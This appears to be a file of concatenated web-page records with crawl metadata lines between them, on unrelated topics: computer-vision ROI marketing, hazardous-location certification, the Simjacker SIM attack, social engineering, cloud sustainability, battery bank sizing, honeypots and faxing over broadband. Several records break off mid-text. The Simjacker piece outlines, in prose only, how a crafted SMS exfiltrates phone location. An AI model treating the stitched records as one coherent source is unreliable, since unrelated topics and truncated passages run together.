When doctors, radiologic technologists, and diagnosticians evaluate radiology images, the smallest oversight can result in a mistaken diagnosis. Unfortunately, these misdiagnoses are all too common—resulting in improper treatment protocols and poor patient outcomes.
To make matters worse, the U.S. Bureau of Labor Statistics predicts serious staffing shortages for radiologic and MRI technologists in the coming years, putting more stress on existing staff—and potentially increasing the chances of misdiagnosis.
Computer vision can relieve these staffing burdens while helping diagnosticians achieve more accurate results. In fact, a recent study in the journal Nature found that computer vision algorithms provided more accurate results than the average human reader (by an absolute margin of 11.5%) when analyzing mammography images for signs of breast cancer. When working with a human partner to provide “double-readings,” these AI systems reduced the workload of human readers by 88%.
In addition to the above study, another investigation showed that a medical AI neural network trained on images of lung X-rays was able to diagnose COVID-19 cases with 98% accuracy.
Computer vision for medical diagnosis frees radiologic technologists to dramatically improve the speed and accuracy of their work. This technology has the capacity to become an essential element of medical infrastructure in the years ahead.
The above ROIs are only a few of the ways computer vision benefits healthcare. Here is a summary of the most important ROIs for healthcare, including additional use cases that were not mentioned:
According to a 2020 survey, 59% of healthcare executives project that they will receive a full return on their medical AI investments in less than three years.
Retail stores are leveraging computer vision to take advantage of many of the ROIs mentioned above—in addition to reducing shrink, improving customer experiences, and optimizing their multichannel operations.
Here are three areas where retail stores are experiencing unique ROI advantages:
Out-of-stock items decrease sales, hurt consumer satisfaction and interfere with customer loyalty. According to Harvard Business Review, “stock-outs cause walk-outs.” 21-43% of customers will choose to shop somewhere else when they cannot readily find the items they want. More poignantly these abandoned sales cause annual losses of approximately 4% for retailers.
Computer vision solutions help reduce out-of-stock items by notifying retail employees when shelves are out of stock and need re-organizing/tidying. These systems also automate inventory reordering so key items are never out of stock.
Walmart has already experimented with computer vision strategies that use “shelf-scanning robots” that search for product supply irregularities. These AI-powered stock-out monitoring solutions offer better awareness of out-of-stock items while freeing up human employees to focus more strategically on restocking shelves and providing the best customer service.
he insights gained from tracking consumer behavior on smartphones have helped retailers dramatically improve the quality of their customers’ online experiences. Computer vision is now empowering a similar kind of revolution in customer experience improvement at physical stores. With computer vision’s capacity to track the detailed nuances of virtually any consumer behavior and interaction in retail stores, computer vision offers deep, real-time insights into the following:
With its revolutionary capacity to track and derive insights from minute customer behaviors, computer vision is empowering retailers to optimize customer interactions, customer satisfaction, and retail sales efficiency like never before.
Shoplifting and employee theft cause over 60% of inventory shrinkage in retail. One of the most common factors that lead to retail theft is a lack of restrictions on employee-only zones like stockrooms, offices, and break rooms—and/or the inability to monitor these areas and enforce the restrictions. Another common problem happens when check-out clerks aid shoplifters by purposefully failing to scan items.
Computer vision for retail loss prevention offers the following solutions:
The above ROIs are only a few of the ways computer vision benefits the retail industry. Here is a summary of the most important computer vision ROIs for retail, including additional use cases that were not mentioned:
Computer vision for retail achieves the following ROIs:
The above use cases for computer vision in retail yield higher profits, reduced inventory shrinkage, better customer behavior tracking, improved security, fewer labor costs, actionable data-driven insights, and dramatically greater process efficiency. In the years ahead, retailers can expect to see even more applications of this exciting technology in their industry.
Computer vision technology provides high business ROIs across many use cases and industries. Due to its capacity to achieve virtually any task that requires human eyes, human expertise, and human understanding—with greater speed, accuracy, consistency, cost efficiency than humans—this technology is radically transforming the ROI potential of every sector it touches. Now, computer vision solutions are rapidly deployable to businesses seeking exponential improvements in the areas of safety, security, quality assurance, patient outcomes, customer experience, industrial maintenance, and so much more.
At Chooch, we work closely with our ecosystem partners and customers to ensure high ROIs for each one of their computer vision initiatives. In the years ahead, as more businesses recognize the transformative power of computer vision, we look forward to helping firms across all industries—including manufacturing, energy, logistics, warehousing, retail, healthcare, construction, and other sectors—achieve exponentially better outcomes.
If you would like to learn about how computer vision can overcome unique challenges in your industry, contact our team and schedule a demo of the Chooch platform now. | <urn:uuid:b0d5d253-fc4f-499d-b351-7ed97fb2197a> | CC-MAIN-2022-40 | https://chooch.ai/ai-roi-paper/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334871.54/warc/CC-MAIN-20220926113251-20220926143251-00118.warc.gz | en | 0.92873 | 3,200 | 2.84375 | 3 |
Learn about CID1 and CID2 intrinsic safety certification and how Getac ANSI/UL certified tablets and laptops can help you work in hazardous environments.
What is CID2?
“Class 1 Division 2” is a classification for dangerous environments where fire hazards such as flammable gases, vapors, or liquids exist. CID2 classifications were established by the National Fire Protection Association’s Publication 70 and clarify the different classes and divisions of hazardous sites. In CID2 conditions, devices and equipment that meet CID2 standards minimize the risk for spark, ignition, or explosion. These standards and ATEX certifications verify similar degrees of protection, with CID2 used most commonly in North America and ATEX used in Europe.
CID1 vs CID2
CID2 is not the only explosive atmosphere classification. The governing classification system includes three classes and two divisions differentiating the level of explosive or otherwise dangerous gases, vapors, and mists present.
A explosive environment’s class is determined by the type of hazardous material present in the air.
Class 1: Gases, Vapors, and Mists
Class 2: Combustible Dust
Class 3: Easily ignitable fibers, or flyings.
Division is decided by the consistency of hazards present in the environment.
Division 1: Hazards are present in the air during normal operating conditions.
Division 2: Hazards are present in the air for limited amounts of time during system failures or faults.
With this system, the difference between a CID1 and CID2 environment is whether explosive materials are present consistently (CID1) or if they are usually contained in closed canisters or systems, and only exposed during a system failure (CID2).
Graphic Recommended to demonstrate classification system similar to the one below
Where are CID2 Certifications Required?
Flammable particulates can be found in many industries. Any industry that deals with chemicals or combustible materials should use CID2-certified devices to protect workers and business assets. Industries that require CID2 certification include chemical makers, oil and gas companies, mining operations, and industrial and automotive manufacturers.
UL & C-UL Certification
CID2 certification can be done with the help of UL (Underwriters Laboratories), a safety science leader and non-profit testing organization that evaluates, tests, and certifies devices built for hazardous locations. Their testing standards ensure that any certified device follows the standards of UL, American National Standards Institute (ANSI), and CSA standards provide enhanced safety in certain workplaces.
UL & C-UL Markings
If certified for use in a hazardous area, devices will be marked with a UL label. These labels include further subdivisions that certify the types of hazardous materials that devices are protected against, and their temperature classes.
Getac CID2 Certified Rugged Computing Solutions
Getac offers a broad variety of rugged and intrinsically safe laptops and tablets that make field professionals working in explosive atmospheres more productive, without compromising safety. | <urn:uuid:d7010beb-fcbf-4c60-96fd-2e2c07b09234> | CC-MAIN-2022-40 | https://www.getac.com/us/certifications/c1d2-certification/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334871.54/warc/CC-MAIN-20220926113251-20220926143251-00118.warc.gz | en | 0.901797 | 648 | 3.171875 | 3 |
A modern smartphone is less a phone than it is a collection of small computers housed in a very expensive glass and polished metal case. Those computers run a variety of software, much of which is invisible to the user, and software has bugs, some of which can be exploited in devastating ways.
Researchers have uncovered an arcane vulnerability in a piece of software buried deep in many mobile phones that can allow an attacker to gain control of a target phone surreptitiously, simply by sending a malicious SMS to the phone. The attack has been used by at least one group against victims in several countries and does not require the victim to click on a link in the message or visit an attacker-controlled website. The SMS contains a set of instructions for the SIM card, which is a tiny computer that gives the phone its identity and allows it to access data networks. Some cards hold a number of different applications on them that control low-level operations for the device. The attack that researchers at AdaptiveMobile Security observed and have named Simjacker exploits an issue with the SIMalliance Toolbox Browser, or S@T browser, an older piece of software on some SIM cards on GSM networks.
The researchers said they have seen the attack targeting phone numbers from a number of different countries. The specific attack that AdaptiveMobile has observed requires the target device to have the S@T Browser on the SIM card and to accept the kind of SMS messages that carry the instructions.
“This Simjacker Attack Message, sent from another handset, a GSM Modem or a SMS sending account connected to an A2P account, contains a series of SIM Toolkit (STK) instructions, and is specifically crafted to be passed on to the UICC/eUICC (SIM Card) within the device. In order for these instructions to work, the attack exploits the presence of a particular piece of software, called the S@T Browser - that is on the UICC,” Cathal Mc Daid, CTO of AdaptiveMobile, wrote in a post explaining the vulnerability and attack scenario.
“Once the Simjacker Attack Message is received by the UICC, it uses the S@T Browser library as an execution environment on the UICC, where it can trigger logic on the handset. For the main attack observed, the Simjacker code running on the UICC requests location and specific device information (the IMEI) from the handset. Once this information is retrieved, the Simjacker code running on the UICC then collates it and sends the combined information to a recipient number via another SMS (we call this the ‘Data Message’), again by triggering logic on the handset. This Data Message is the method by which the location and IMEI information can be exfiltrated to a remote phone controlled by the attacker.”
"In short, the advent of Simjacker means that attackers of mobile operators have invested heavily in new attack techniques."
The result of the attack is that the remote adversary has access to a wide range of information on the exploited phone, including real-time location data, and also has the ability to send texts, make calls, open apps, and take other actions on the device. Mc Daid said most of the devices that the company has observed being targeted are attacked just once a week, although a small number are hit several times per week. This suggests that the attackers are not maintaining persistent access to the devices once they’re exploited.
“A few phone numbers, presumably high-value, were attempted to be tracked several hundred times over a 7-day period, but most had much smaller volumes. A similar pattern was seen looking at per-day activity, many phone numbers were targeted repeatedly over several days, weeks or months at a time, while others were targeted as a once-off attack,” Mc Daid said.
“These patterns and the number of tracking indicates it is not a mass surveillance operation, but one designed to track a large number of individuals for a variety of purposes, with targets and priorities shifting over time.”
Mc Daid, who plans to present more details on the vulnerability and attack at the Virus Bulletin conference next month, said the company has been working with mobile providers and network operators to address and mitigate the threat.
“We believe that the Simjacker attack evolved as a direct replacement for the abilities that were lost to mobile network attackers when operators started to secure their SS7 and Diameter infrastructure. But whereas successful SS7 attacks required specific SS7 knowledge (and access), the Simjacker Attack Message require a much broader range of specific SMS , SIM Card, Handset, Sim Toolkit, S@T Browser and SS7 knowledge to craft,” Mc Daid said.
“This investment has clearly paid off for the attackers, as they ended up with a method to control any mobile phone in a certain country, all with only a $10 GSM Modem and a target phone number. In short, the advent of Simjacker means that attackers of mobile operators have invested heavily in new attack techniques, and this new investment and skillset means we should expect more of these kinds of complex attacks.” | <urn:uuid:7a9eb970-1ed7-4224-af26-585cd14fda94> | CC-MAIN-2022-40 | https://duo.com/decipher/simjacker-attack-exploits-deep-seated-weakness-in-phones | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335058.80/warc/CC-MAIN-20220927194248-20220927224248-00118.warc.gz | en | 0.953933 | 1,081 | 2.75 | 3 |
As prevalent as cybersecurity threats unfortunately are today, many users tend to overlook major threats that they just aren’t focused on nearly as much: social engineering attacks. Social engineering attacks are just another means for a cybercriminal to reach their desired ends, and therefore needed to be protected against.
What is Social Engineering?
Social Engineering is the act of manipulating people into providing access credentials to criminals that aren’t supposed to have access to a system. To do this, the social engineer uses his/her influence (real or not) to trick people into supplying the needed information.
The act of social engineering can be approached in multiple ways. Hackers can take advantage of user carelessness, they can come in as a helpful party, they can take advantage of an individual’s fear, and they can exploit a person’s comfort zone. Let’s take a look at each.
Despite the need for information systems, companies largely depend on individual users to secure their own endpoints. Sure, they will put in place a set of tools designed to keep network resources secure, but overall, it is important for each user to maintain vigilance over their own workstation and other network-attached devices. If they aren’t, scammers can obtain access fairly easily.
If they can’t use spam or phishing messages to gain access, they may have to try an alternate method. For example, a scammer may gain access to your workspace. If your people ignore best practices for convenience and leave credentials or correspondence out in the open, a scammer looking for things like this will be able to leverage that mishap into access most of the time.
Most people will help people that are having trouble. The impulse to be helpful can be taken advantage of if the “victim” is a hacker. People can hold the door for a cyberthief giving them access to your office. They can use information syphoned from the web to gain a person’s trust and then use the trusting nature of good people for nefarious means. Moreover, it is natural to want to help someone, so you and your staff have to be careful that they are, in fact, in need of help and not looking to steal access to company resources.
Working Within the Comfort Zone
Most workers do what they are told. If they have somewhat repetitive tasks, they may grow complacent. Social engineering tactics will take advantage of this, especially at a large company. The scammer will get into your office and if some employees are used to random people just milling around, they won’t really pay any mind.
We typically like to think about hackers as loners that sit in the dark and slurp energy drinks while they surf the Dark Web. While this description is fun, it’s not realistic. Hackers, the ones that you should be worried about, know your company’s weakest points and will take advantage of them. If that weakest link is the complacency of your employees, that will be the way they will approach it. Unfortunately, this also technically includes insider threats.
Getting someone to do something out of fear is effective, but can be risky. The more fear someone has, the more they will look to others to help mitigate it. That’s why most fear tactics, nowadays, come in the form of phishing messages. Using email, instant messaging, SMS, or other means to get someone worried enough to react to a threat takes a believable story that could produce an impulsive reaction by a user. Fear has long been known to be a powerful motivator, so it really is no surprise that cybercriminals would resort to this means to coerce their targets into compliance.
We Can Help
If you would like more information about social engineering or any other cybersecurity issue, contact the IT experts at CTN Solutions at (610) 828- 5500. | <urn:uuid:f4d8b968-22f4-4b4d-94ef-0c5aabb8a735> | CC-MAIN-2022-40 | https://ctnsolutions.com/social-engineering-and-your-business/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335304.71/warc/CC-MAIN-20220929034214-20220929064214-00118.warc.gz | en | 0.954049 | 817 | 3.296875 | 3 |
The White House National Space Council has released a new strategy that seeks to protect the Earth and other planetary bodies from biological contamination associated with space exploration activities and ensure safe and sustainable commercialization and exploration of space.
The National Strategy for Planetary Protection has three objectives and the first calls for the U.S. to avoid “forward contamination” through the development and implementation of risk assessment and science-based guidelines and an update to the interagency payload review process.
The second objective seeks to prevent “backward contamination” through the development of a Restricted Return Program, while the last objective calls for the incorporation of the private sector’s needs and perspective through feedback solicitation and creation of guidelines for private sector activities.
For the first objective, the government should come up with a forward contamination framework and risk-informed decision-making implementation strategies for human missions within one year.
“Meeting the strategy’s objectives will ensure a cohesive national effort that balances scientific discovery, human exploration, and commercial activity in space, while meeting applicable international and domestic obligations,” the strategy’s fact sheet reads. | <urn:uuid:d1685663-313a-42a4-b646-6a4258d46ecc> | CC-MAIN-2022-40 | https://executivegov.com/2021/01/white-house-issues-national-strategy-for-planetary-protection/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335469.40/warc/CC-MAIN-20220930113830-20220930143830-00118.warc.gz | en | 0.88649 | 229 | 2.875 | 3 |
What Cloud Computing Can Do For Sustainability
As organizations increasingly move their data and applications to cloud-based models, the opportunities for sustainable business practices abound. Cloud service providers have made great strides in incorporating renewable energy sources into their data center infrastructure, reducing consumption of natural resources, and improving the efficiency of their operations. For businesses looking to adopt more sustainable practices, cloud computing can provide an important pathway to success.
Cloud computing has the potential to play a major role in sustainability. Its ability to improve resource utilization and decrease emissions makes it an attractive option for organizations looking to reduce their environmental impact. Additionally, cloud computing can help organizations save money by reducing energy costs and improving operational efficiency.
Despite these potential benefits, there are still many challenges that need to be addressed before cloud computing can truly become a sustainable solution. One of the biggest challenges is ensuring that data centers are powered by renewable energy sources. Data centers are extremely energy-intensive, and as more and more businesses move to the cloud, the demand for renewable energy will only increase. Additionally, it is important to ensure that data center infrastructure is designed for efficiency and scalability. Scalable infrastructure will be essential as the demand for cloud services grows.
The Application of Cloud Computing for Sustainability
Cloud computing is an emerging area of information technology that holds great promise for sustainability. Cloud computing has already begun to play a significant role in sustainability initiatives across the globe. For example, it has been used to increase energy efficiency in data centers, create virtual power plants, and enable real-time monitoring of energy use. Moreover, cloud-based applications and services can help organizations reduce their paper consumption, travel costs, and carbon footprints.
The potential benefits of cloud computing for sustainability are vast. However, there are also some challenges that need to be addressed, such as data security and privacy, energy use, and environmental impact.
Despite the challenges, cloud computing offers a tremendous opportunity to accelerate progress towards a more sustainable future. With its ability to provide organizations with flexible resources and economies of scale, cloud computing can help reduce their environmental impact and enable them to operate more efficiently and sustainably.
How Cloud Computing is Used for Sustainability
Cloud computing is an emerging technology that enables organizations to reduce their reliance on traditional, on-premises IT infrastructure. Additionally, cloud computing can help organizations improve their sustainability performance by enabling them to optimize energy use and reduce carbon emissions.
In recent years, a number of companies have begun using cloud computing to support their sustainability initiatives. For example, Walmart has used the technology to create an “Eco-mart” prototype store that uses 20% less energy than a traditional store. Similarly, Coca-Cola has used cloud computing to design more energy-efficient coolers for its products.
Many experts believe that cloud computing will play a significant role in helping organizations achieve their sustainability goals. As more companies adopt the technology, it is likely that its impact on sustainability will continue to grow.
Transforming for Innovation and Sustainability securing future competitive advantage
Benefits of Using Cloud Technologies for Sustainability Efforts
Cloud technologies offer a number of advantages for sustainability efforts. One key benefit is the ability to rapidly scale up or down as needed, which can help organizations save on energy costs. Additionally, cloud-based solutions often offer greater flexibility and agility than traditional on-premises options, making it easier for organizations to respond quickly to changes in market conditions or customer needs.
Another advantage of using cloud technologies is that they can help organizations improve their carbon footprint. For example, by moving data and applications to the cloud, companies can reduce their reliance on energy-intensive data centers. In addition, many cloud providers offer green computing options, such as using renewable energy to power their facilities.
Finally, cloud technologies can also help companies better measure and manage their environmental impact. For instance, by using cloud-based monitoring and reporting tools, organizations can track their energy usage and emissions in real-time. This information can then be used to identify areas where improvements can be made.
Overall, cloud technologies offer a number of benefits for sustainability efforts. By reducing energy costs, increasing agility, and improving carbon management, they can help organizations meet their environmental goals.
It Reduces Energy Consumption
Cloud computing has been one of the most game-changing innovations in recent history. Not only has it made it possible for businesses to operate more efficiently, but it has also had a profound impact on helping to reduce energy consumption.
One of the key ways that cloud computing reduces energy consumption is through its use of virtualization. Virtualization is the process of creating a virtual version of something, such as a server, storage device, or network resource. By using virtualization, businesses can run multiple applications and services on a single physical server, which reduces the need for additional hardware and corresponding energy consumption.
In addition to reducing energy consumption through virtualization, cloud computing also helps by making data center operations more efficient. Data centers are notoriously energy-intensive, and by migrating to the cloud, businesses can take advantage of more efficient data center technologies and practices, such as using serverless computing or green data centers.
Overall, cloud computing provides a number of benefits that help to reduce energy consumption. By using virtualization and more efficient data center operations, businesses can save energy and help to protect the environment.
It is Powered by Renewable Energy
Cloud computing is powered by renewable energy to help the environment. This is done by using data centers that are powered by renewable energy sources, such as solar and wind power. Cloud computing also helps to save energy by using virtualization technologies. Virtualization allows multiple computers to share the same physical resources, which reduces the amount of energy used overall. Additionally, cloud computing can help organizations reduce their carbon footprints by enabling them to use less paper and travel less.
It Reduces Greenhouse Gas Emissions
Cloud computing has been shown to be a major driver of reducing greenhouse gas emissions. In fact, a recent study by the Carbon Disclosure Project found that organizations using cloud services reduced their carbon dioxide emissions by an average of 18 percent.
The report also found that the use of cloud services helped organizations improve their energy efficiency by an average of 24 percent. And perhaps most importantly, the study showed that the use of cloud services could help reduce an organization’s overall carbon footprint by up to 90 percent.
So how does cloud computing help reduce greenhouse gas emissions? There are a few key ways.
First, when you use cloud services, you don’t have to run your own servers or data centers. This means you don’t have to use as much electricity, which in turn reduces your carbon footprint.
Second, cloud providers are often able to utilize renewable energy sources, such as solar and wind power, to power their data centers. This means that your carbon footprint is further reduced when you use cloud services.
Lastly, cloud providers often have very efficient data centers that use less energy than traditional data centers. This efficiency results in lower carbon dioxide emissions.
So if you’re looking for ways to reduce your organization’s carbon footprint, consider using cloud services. You’ll be doing your part to help the environment while also benefiting from the many other advantages of cloud computing.
Frequently Asked Questions
It Results in Dematerialization
One of the most important ways in which cloud computing can help the environment is through dematerialization. Dematerialization is the process of reducing the number of physical materials used in a product or service. When applied to computing, it refers to reducing the need for physical hardware and other resources by using cloud-based solutions.
There are many benefits of dematerialization, but one of the most important is that it can help reduce waste and conserve resources. For example, when a company uses cloud-based applications, they don’t need to use as much paper because everything is stored electronically. This not only saves trees and other resources but also reduces greenhouse gas emissions from transportation and manufacturing.
Another benefit of dematerialization is that it can help reduce energy consumption. When data is stored electronically, it doesn’t need to be accessed as often, which means that servers and other computing resources can be turned off or used less frequently. This can lead to significant reductions in energy use and associated emissions.
Finally, dematerialization can also help improve security and resilience. When data is stored in the cloud, it can be backed up and replicated more easily than if it were stored on physical hardware. This makes it less likely that data will be lost in the event of a disaster, such as a fire or a flood. And because cloud-based solutions are often updated automatically, they can provide better security against emerging threats.
Cloud computing has already had a major impact on the environment, and this is likely to continue as more companies and individuals adopt cloud-based solutions. As we move toward a more sustainable future, dematerialization will play an increasingly important role in helping us to reduce our reliance on physical resources and conserve energy.
What Kinds of Applications Are Being Used on the Cloud?
There are many different types of applications that are being used on the cloud for sustainability and environmental protection. Some of these applications are designed to help businesses save energy and reduce their carbon footprint, while others are created to help individuals track their own energy use and make more sustainable choices.
Some popular applications for sustainability include:
- GreenButton: This application helps businesses save energy by allowing them to monitor and manage their electricity use.
- Eco-Trip Planner: This application helps individuals plan more sustainable trips by providing information on the most eco-friendly transportation options, routes, and accommodations.
- Sustainable Seafood Guide: This application provides information on which seafood items are sustainably caught or farmed so that consumers can make more sustainable choices when purchasing seafood.
- Greenhouse Gas Emissions Calculator: This application allows businesses and individuals to calculate their emissions so that they can take steps to reduce them.
- Sustainable Agriculture Information: This application provides information on sustainable agriculture practices so that farmers can adopt more eco-friendly methods.
These are just a few of the many different types of applications that are available for sustainability and environmental protection. By using these applications, businesses and individuals can save energy, reduce their carbon footprint, and make more sustainable choices.
Cloud computing has the potential to provide sustainable solutions for many of our society’s most pressing issues. From reducing energy consumption and greenhouse gas emissions to enabling more efficient use of resources, cloud-based systems have the ability to make a real difference. If you are interested in learning more about how your organization could benefit from Cloud Computing Technologies with regard to sustainability, please get in touch. We would be happy to discuss your specific needs and see how we can help you achieve your sustainability goals. | <urn:uuid:b73ab041-cb24-4d0e-9558-9f1dfd00f899> | CC-MAIN-2022-40 | https://cloudcomputingtechnologies.com/what-cloud-computing-can-do-for-sustainability/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336921.76/warc/CC-MAIN-20221001195125-20221001225125-00118.warc.gz | en | 0.949504 | 2,207 | 3.078125 | 3 |
Space Exploration Informs Deep Sea Robot
A team of ex-NASA roboticists used learnings from space exploration robots to create machines capable of withstanding an equally difficult-to-access and underexplored environment; the deep ocean.
Nauticus Robotics, a Houston-based developer of cloud-based subsea robots, have applied some of the same learnings gleaned from work on NASA’s space exploration robot Robonaut 2 to create an autonomous, deep sea robot.
“What NASA taught us is to put together robust software autonomy with a capable hardware morphology and deploy it in a remote setting,” said Nic Radford, founder and CEO of Nauticus. Radford worked as a deputy project manager and chief engineer for the humanoid robot Robonaut 2 during his 14 years at NASA, though he has since turned his capabilities to ocean exploration.
Robonaut 2 was a perfect demonstration of how robots could be designed and deployed in previously inaccessible environments while remaining as autonomous as possible to ease operator control down on Earth. The robot’s design featured tendon-powered hands, elastic joints, and miniaturized load cells, as well as vision systems, force sensors, and infrared sensors to gather information. Finally, it was also kitted out with image-recognition software, control algorithms, and ultra-high-speed joint controllers to process and action data. All this allowed it to gain a level of interaction with and understanding of its environment that enabled a high level of autonomy.
“Even if you’re putting it on the space station and controlling it from the ground, there’s not a high-speed data network. Talking to the space station to control the robot is more akin to using dial-up,” said Radford.
Designing a robot for the deep ocean relies on some of the same principles in creating one that can withstand harsh conditions and can understand its environment enough to make up for communication difficulties with a remote team. Indeed, given the distance between operator and robot, Aquanaut had to be able to perceive and interact with its surroundings as autonomously as possible and with the least amount of operator input.
Nauticus’ Aquanaut is entirely electric and the size of a small car, and the suite of cameras and sensors are placed in the “nose” of the robot, giving it a heightened sense of its surroundings that allows it to work with minimal supervision. Its arms can be customized to feature different tools, depending on the task at hand.
The robot has a number of potential applications such as service and maintenance on offshore oil wells and wind turbines, as well as aquaculture– an industry slated to grow as solutions to feed growing global populations become increasingly necessary.
“Space is amazing because it feels existential – it’s way out there, and people want to explore it,” Radford adds. “But it turns out there are also many real challenges right here beneath the ocean, and we could stand to do more innovating in the ‘blue economy.’” | <urn:uuid:868ffe8f-ec89-41b2-8cdb-4bc6cb691add> | CC-MAIN-2022-40 | https://www.iotworldtoday.com/2022/08/13/nasa-gm-team-to-robot-for-deep-sea-space-missions/?utm_source=dlvr.it&utm_medium=twitter | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337504.21/warc/CC-MAIN-20221004121345-20221004151345-00118.warc.gz | en | 0.953136 | 636 | 3.078125 | 3 |
The following steps can be used to estimate the size of a battery bank for a stand-alone PV system (and other systems).
1. Calculate the average daily AC load at Wh per day (this is done before the battery bank sizing by using utility electric bills or adding the watts for each item using power).
2. Divide step 1 by inverter efficiency.
3. Divide step 2 by system DC voltage.
4. Step 3 is the average (required) Ah per day.
5. Multiply step 4 by days of autonomy.
6. If using lead-acid batteries, multiply step 5 by the temperature multiplier (see note 1).
7. Divide step 6 by percent DOD (if not using lead-acid batteries, divide step 5 by percent DOD).
8. Divide step 7 by (selected for the system) battery Ah rating.
9. Step 8 is the number of batteries required in parallel.
10. Divide system DC voltage by battery voltage (see note 2).
11. Step 10 is the number of batteries required in a series string.
12. Multiply step 11 by step 8.
13. Step 12 is the total number of batteries required in the battery bank.
Note 1: This is a derating factor based on the lowest ambient temperature of the battery bank and is usually in the battery specification.
Note 2: As an example, the system DC voltage is selected as 24V and the battery voltage as 12V; therefore, two batteries per series string are required. This criterion is part of the design selection process.
Battery Bank Sizing Example
Design a battery bank backup system for a PV- array stand-alone system (see Figure 1). The system output is AC supplied by an inverter. Batteries will supply power on days of autonomy and at night.
• Load requirement: 14 kWh per day
• Days of autonomy: 2
• Battery system: 24V
• Battery spec.:12V at 250 Ah lead-acid deep-cycle
• DOD: 70%
• Lowest ambient temperature: 40°F (1.3 temperature multiplier)
• Inverter efficiency: 90%
Note: In Figure 1, the area for battery bank sizing is within the dotted line. The array must supply power to meet the charging and system requirements when the array is generating power, and this is calculated when the array size is determined. When sufficient power cannot be generated by the array to meet total demand, then only critical loads will be supplied. In this circumstance, a motor generator is often used to supplement power requirements.
Figure 1 Stand-alone configuration with battery backup | <urn:uuid:46c0fffe-1e47-411e-b4ac-6c6f0b47ca25> | CC-MAIN-2022-40 | https://electricala2z.com/renewable-energy/battery-bank-sizing/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337668.62/warc/CC-MAIN-20221005203530-20221005233530-00118.warc.gz | en | 0.851754 | 544 | 3.375 | 3 |
Most of our modern conveniences rely on the stable delivery of electricity. But that wasn’t always possible. Like every technology, someone had to invent it. In fact, two men invented two different systems. One inventor has a familiar name, Thomas Edison. You may not know much about the other, Nikola Tesla. Learn about him and his battle with a not-always-nice Edison.
Stop robocalls once and for all
Robocalls are not only annoying, but they scam Americans out of millions every year. Learn Kim's tricks for stopping them for good in this handy guide. | <urn:uuid:9511057a-c1b4-4f77-9a3f-36a99035558f> | CC-MAIN-2022-40 | https://www.komando.com/video/komando-picks/short-history-of-nikola-tesla/659241/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337971.74/warc/CC-MAIN-20221007045521-20221007075521-00118.warc.gz | en | 0.952214 | 125 | 2.53125 | 3 |
When it comes to cyber attacks and intrusions, time is the essence! Being able to detect them early on is crucial and various techniques like honeypots can make your cyber security team very quick on their feet. Keep reading to learn more!
When an intruder finds their way into your systems, they do their best to be stealthy since your cyber security team cannot do anything to stop the attack if they don’t even know about it! That is why being able to detect even the attempt of an attack is very important if you want to quickly contain and stop it before it does any actual harm to your organization.
For the future and wellbeing of your business and safety of your sensitive information, having proper network intrusion systems is essential and honeypot aims to offer you exactly that. In this article we will discuss what a honeypot is and how it can be used for network intrusion detection.
What is a honeypot?
A honeypot can be defined as a mechanism or a structure that serves as a trap for the attackers. It has the ability to mimic the actual targets of the cyber attacks, as a result it is able to lure the attackers.
A honeypot can be used for educational purposes or security purposes. For the former, the cyber security team of the organization sets up the honeypot. After an attacker or a group of attackers target it to exploit its vulnerabilities, the team examines the honeypot and which vulnerabilities are exploited in order to learn from this experience and enhance the security posture of their organization.
When used for the security purposes, the honeypot acts as a decoy. It distracts the attackers from the actual, valuable resources of the organization and costs them time.
How to use honeypot for network intrusion detection
As we discussed above, honeypots can be used for educational purposes, but also they can easily be implemented into network intrusion detection systems.
The principle for incorporating honeypots into network intrusion detection is very simple: Honeypot lures the intruder and costs them a significant amount of time. After this attack attempt is contained, the information provided by honeypot is analysed in detail. Honeypot can tell us how the attacker detected the vulnerabilities on the security posture of the organization, how they exploited those vulnerabilities and such valuable information. In other words, honeypot allows the cyber security professionals to observe actions of the attacker.
With the information provided by the honeypot, the cyber security team can enhance and upgrade the security posture of your organization. Honeypot offers insight regarding the motivation of the attackers, which tools they used and so forth.
If you would like to enhance the security posture of your operation, feel free to get in touch. We offer tailor-made SIEM and SOAR applications and one of a kind cyber security solutions. | <urn:uuid:b473adfa-2413-4176-be7b-09518caa149b> | CC-MAIN-2022-40 | https://www.logsign.com/blog/how-to-use-honeypot-for-network-intrusion-detection/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337971.74/warc/CC-MAIN-20221007045521-20221007075521-00118.warc.gz | en | 0.942702 | 561 | 2.78125 | 3 |
What is thermal monitoring?
One of the major causes of fire in electrical equipment is faulty joints or connections, where an increase in temperature is the primary symptom and an indicator that a potential problem could occur. Thermal monitoring enables organizations to detect the symptoms in those joints or connections that without intervention could otherwise lead to electrical outages, or worse, a fire.
Without early identification, the deterioration of faulty electrical joints or connections will lead to increased resistance and higher temperature, which will eventually result in thermal runaway and ultimately, a complete failure. Arc flash and fire, or even an explosion might occur, causing unexpected plant downtime, or potentially leading to catastrophic consequences such as total equipment destruction or even personnel injury.
Continuous thermal monitoring is the next technology step from periodic infrared inspection:
- Permanently installed sensors inside electrical equipment provide 24/7 protection
- Delivers real-time, integrated temperature data for critical electrical assets
This enables electrical maintenance teams to predict failures, safeguard electrical equipment, and optimize performance. With the disruption to power supply posing an increasingly critical threat to organizations, the requirement for innovative thermal monitoring solutions for industry to maximize uptime through the prediction of faults before they occur. Additional benefits delivered by this technology include increased personnel safety and extended asset lifespan. | <urn:uuid:a88e67a4-42d0-4630-be19-9d6df21985e0> | CC-MAIN-2022-40 | https://blog.exertherm.com/thermal-monitoring-for-electrical-equipment-and-critical-infrastructure | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334515.14/warc/CC-MAIN-20220925070216-20220925100216-00318.warc.gz | en | 0.899335 | 254 | 2.59375 | 3 |
Faxing over Broadband: The Problem & The Cure
Broadband is here in a big way, and there is no doubt that the migration from copper to broadband is huge for phone companies/carriers alike.
With this migration to broadband companies are finding that the voice portion for the most part is fine, until they try to send or receive a fax over that Broadband channel. Perhaps that first fax session or two will be perfectly fine. But sooner or later you will start to notice that faxing just doesn’t seem to work as well as you remember it working on the good old copper phone line.
So what’s going on?
